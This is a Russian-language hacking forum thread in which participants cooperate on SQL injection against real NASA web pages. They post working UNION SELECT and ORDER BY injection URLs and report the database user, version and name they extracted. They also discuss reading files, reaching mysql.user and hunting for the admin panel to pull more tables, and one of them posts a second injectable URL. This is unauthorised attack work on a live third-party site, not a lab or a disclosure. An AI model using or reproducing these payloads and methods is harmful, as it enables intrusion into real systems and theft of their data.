Интересная ссылка, меня сразу заинтриговала:
umbra.nascom.nasa.gov/eit/eit_guide/listings/anal.htm
Я, безусловно, понимаю, что anal - это еще и дотошный, суетливый, и тем не менее.

А вот SQL-inject. Обработать грамотно мне не хватило времени, прошу тех, кто возьмется - сообщить результаты.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679'+order+by+14--
P. S. order by здесь не при делах.

ордер бай в мускле ВСЕГДА при делах.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'union+select+1,2,3,4,5,6,7/*

Я имел ввиду только то, что запрос с ORDER BY 14 не соответсвует реальному количеству столбцов \very SAD\.

2 ZaCo - а каким методом ты выяснил, что там string параметр? Просто по-опыту?

а при чем тут вообще 14? че ты мне гонишь. order by 7 последний. учитывая что это мусуль то это и есь последний тк на 8 ошибка.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa

Благодаря ZaCo выявил следующее:
USER() - web@localhost
VERSION - 4.0.14-standard
DATABASE() - eospso

2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*

И, что еще не понятнее - чем объясняется тот факт, что запрос с комментарием -- в конце не работает, а твой - пашет???

хотя бы потому что там 4 ветка. -- работает до конца строки, /* до конца запроса

а при чем тут вообще 14? Я наугад поставил цифру, чтобы не упрщать задачу другим, я это имел ввиду.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa

А я пишу 'xa' в параметр и не вижу ничего!

Объясни, епожалуйста, если не лень, конечно про тип поподробнее.

2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*


Потому что INFORMATION_SCHEMA.COLUMNS в MSSQL.

я електу поставил, но не за тупость) а за ошибочное мнение. в пятой ветке мускля information_schema является системной таблицей.
1ten0.0net1 перебором - пробуешь строку, если прокатило то там можно попробовать поставить строковую функцию.

А почему не работает http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20eospso/*

Файлы там не читает, к mysql.user доступа нет. Коннект с локалхоста. Видимо, ловить оттуда нечего.

я електу поставил, но не за тупость) а за ошибочное мнение. в пятой ветке мускля information_schema является системной таблицей.
1ten0.0net1 перебором - пробуешь строку, если прокатило то там можно попробовать поставить строковую функцию.

Да, версия, оказывается, много значит.

А по поводу типа. Может я, конечно, совем, адвот, но:
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679
Резулт: Выдает какой-то текст.

http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff
Резулт:пустота, не прокатило.
Какой тогда перебор?

не работает потому что нет таблицы такой. я если честно не понимаю зачем все так тупо ищут уязвимости, а потом не знают что с ними делать.
1ten0.0net1 перечитай все а тему закрой

не работает потому что нет таблицы такой. я если честно не понимаю зачем все так тупо ищут уязвимости, а потом не знают что с ними делать.
Не знаю как все, а я ищу, чтоюы научиться SQL-inject, поэтому зря ты так меня критикуешь.
Хуже было бы, если бы я их даже находить не умел.

Вобщем, дохлый номер. Лоад файл не катит.
Есть таблица news, но это фигня. Можно поперебирать, но скорее всего нифига не будет.

Посмотри контент сайта, найди админку или какие-нить движки. Тогда можно будет выяснить возможные таблицы и из них выдрать что-нить.

ок, поищу. Пока что еще один инжект нашел
http://eospso.gsfc.nasa.gov/newsroom/archive.php?y=2005&m=ff09'+union+select+1,DATABASE(),3,4/*

Тут уже тип date есть.
Только толка от этого нет.